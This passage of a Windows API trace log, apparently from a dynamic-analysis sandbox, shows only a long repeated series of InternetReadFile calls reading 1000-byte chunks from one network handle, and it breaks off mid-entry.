[0107.089] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398a628, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398a628*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.089] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398aa10, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398aa10*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.089] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398adf8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398adf8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.089] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398b1e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398b1e0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.089] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398b5c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398b5c8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.090] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398b9b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398b9b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.090] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398bd98, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398bd98*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.090] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398c180, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398c180*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.090] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398c568, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398c568*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.090] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398c950, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398c950*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.091] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398cd38, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398cd38*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.091] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398d120, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398d120*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.093] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398d508, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398d508*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.093] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398d8f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398d8f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.093] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398dcd8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398dcd8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.094] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398e0c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398e0c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.094] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398e4a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398e4a8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.094] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398e890, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398e890*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.094] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398ec78, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398ec78*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.094] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398f060, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398f060*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.094] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398f448, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398f448*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.094] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398f830, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398f830*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.095] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398fc18, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398fc18*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.095] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3990000, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3990000*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.095] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39903e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39903e8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.095] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39907d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39907d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.095] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3990bb8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3990bb8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.095] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3990fa0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3990fa0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.096] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3991388, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3991388*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.096] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3991770, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3991770*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.096] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3991b58, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3991b58*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.096] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3991f40, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3991f40*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.096] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3992328, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3992328*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.096] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3992710, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3992710*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.096] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3992af8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3992af8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.097] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3992ee0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3992ee0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.097] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39932c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39932c8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.097] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39936b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39936b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.097] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3993a98, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3993a98*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.097] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3993e80, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3993e80*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.097] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3994268, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3994268*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.097] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3994650, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3994650*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.098] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3994a38, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3994a38*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.098] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3994e20, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3994e20*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.098] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3995208, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3995208*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.098] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39955f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39955f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.098] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39959d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39959d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.098] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3995dc0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3995dc0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.099] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39961a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39961a8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.099] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3996590, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3996590*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.099] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3996978, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3996978*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.099] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3996d60, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3996d60*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.099] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3997148, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3997148*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.099] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3997530, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3997530*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.100] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3997918, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3997918*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.100] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3997d00, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3997d00*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.100] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39980e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39980e8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.100] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39984d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39984d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.100] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39988b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39988b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.100] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3998ca0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3998ca0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.101] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3999088, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3999088*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.101] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3999470, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3999470*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.101] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3999858, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3999858*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.101] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3999c40, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3999c40*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.101] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399a028, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399a028*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.101] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399a410, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399a410*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.102] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399a7f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399a7f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.102] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399abe0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399abe0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.102] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399afc8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399afc8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.102] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399b3b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399b3b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.102] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399b798, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399b798*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.102] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399bb80, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399bb80*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.102] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399bf68, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399bf68*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.103] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399c350, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399c350*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.103] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399c738, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399c738*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.103] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399cb20, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399cb20*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.103] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399cf08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399cf08*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.103] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399d2f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399d2f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.103] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399d6d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399d6d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.104] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399dac0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399dac0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.104] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399dea8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399dea8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.104] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399e290, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399e290*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.104] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399e678, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399e678*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.104] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399ea60, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399ea60*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.104] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399ee48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399ee48*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.104] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399f230, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399f230*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.105] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399f618, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399f618*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.105] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399fa00, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399fa00*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.105] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399fde8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399fde8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.105] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a01d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a01d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.105] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a05b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a05b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.105] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a09a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a09a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.106] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a0d88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a0d88*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.106] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a1170, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a1170*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.106] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a1558, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a1558*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.106] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a1940, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a1940*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.106] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a1d28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a1d28*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.106] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a2110, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a2110*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.107] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a24f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a24f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.107] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a28e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a28e0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.107] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a2cc8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a2cc8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.107] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a30b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a30b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.107] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a3498, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a3498*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.107] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a3880, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a3880*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.107] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a3c68, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a3c68*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.108] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a4050, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a4050*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.108] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a4438, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a4438*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.108] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a4820, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a4820*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.108] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a4c08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a4c08*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.108] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a4ff0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a4ff0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.108] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a53d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a53d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.109] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a57c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a57c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.109] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a5ba8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a5ba8*, 